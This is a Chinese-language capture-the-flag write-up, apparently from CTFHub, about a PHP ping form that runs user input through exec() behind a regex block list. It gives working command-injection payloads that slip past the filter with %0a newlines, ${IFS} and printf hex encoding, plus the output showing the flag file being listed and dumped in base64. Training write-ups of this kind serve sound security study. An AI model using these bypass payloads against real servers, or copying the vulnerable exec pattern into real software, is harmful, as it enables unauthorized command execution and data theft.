目录
1 打开题目,查看如下源码
<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
$ip = $_GET['ip'];
$m = [];
if (!preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/", $ip, $m)) {
$cmd = "ping -c 4 {$ip}";
exec($cmd, $res);
} else {
$res = $m;
}
}
?>
2代码分析
1)通过代码可以分析得到,过滤了命令连接符号&、|、;因此常用命令连接符不可用,可以使用”%0a、%0d“及“\n,\v”。
2)空格符号也被过滤,可以使用${IFS}或者$IFS$9
3)路径连接符也被过滤,可以使用十六进制编码
通过python脚本
from urlib import parse parse.quote()#url编码 parse.unquote()#url解码
3查看当前路径
payload: ?ip=127.0.0.1%0als# 结果: Array ( [0] => PING 127.0.0.1 (127.0.0.1): 56 data bytes [1] => flag_is_here [2] => index.php )
4查看flag_is_here目录
利用printf命令将十六进制数据转换为字符串
# printf${IFS}"\x66\x6c\x61\x67\x5f\x69\x73\x5f\x68\x65\x72\x65\x2f\x66\x6c\x61\x67\x5f\x31\x37\x38\x36\x30\x32\x34\x34\x39\x33\x35\x36\x30\x31\x2e\x70\x68\x70" flag_is_here/flag_17860244935601.php
flag_is_here转为16进制: \x66\x6c\x61\x67\x5f\x69\x73\x5f\x68\x65\x72\x65 payload: ?ip=127.0.0.1%0als${IFS}$(printf${IFS}%22\x66\x6c\x61\x67\x5f\x69\x73\x5f\x68\x65\x72\x65%22)# 返回值: Array ( [0] => PING 127.0.0.1 (127.0.0.1): 56 data bytes [1] => flag_17860244935601.php )
5获取flag值
1)通过返回值可知,flag文件为php文件,不能直接读取,因此进行base64编码
flag_is_here/flag_17860244935601.php转为16进制: \x66\x6c\x61\x67\x5f\x69\x73\x5f\x68\x65\x72\x65\x2f\x66\x6c\x61\x67\x5f\x31\x37\x38\x36\x30\x32\x34\x34\x39\x33\x35\x36\x30\x31\x2e\x70\x68\x70 payload; ip=127.0.0.1%0abase64<$(printf${IFS}%22\x66\x6c\x61\x67\x5f\x69\x73\x5f\x68\x65\x72\x65\x2f\x66\x6c\x61\x67\x5f\x31\x37\x38\x36\x30\x32\x34\x34\x39\x33\x35\x36\x30\x31\x2e\x70\x68\x70%22)# 返回值: Array ( [0] => PING 127.0.0.1 (127.0.0.1): 56 data bytes [1] => PD9waHAgLy8gY3RmaHVie2YxZTVhZGYwZjliOGVkNTc0ODJlOThkY30K )
2)base64转码
b'<?php // ctfhub{f1e5adf0f9b8ed57482e98dc}\n'
6使用的python脚本
#!C:\Python3.7 # -*- coding:utf-8 -*- import requests import base64 from urllib import parse def char2hex(s): h="" for i in s: tem =(hex(ord(i))) h+=tem print(h) h=str(h).replace("0x","\\x") print(h) if __name__ == '__main__': print(base64.b64decode("PD9waHAgLy8gY3RmaHVie2YxZTVhZGYwZjliOGVkNTc0ODJlOThkY30K")) char2hex("flag_is_here/flag_17860244935601.php") ##parse.quote()url编码 ##parse.unquote()url解码 # for i in range(128): # print(i,parse.quote(chr(i)))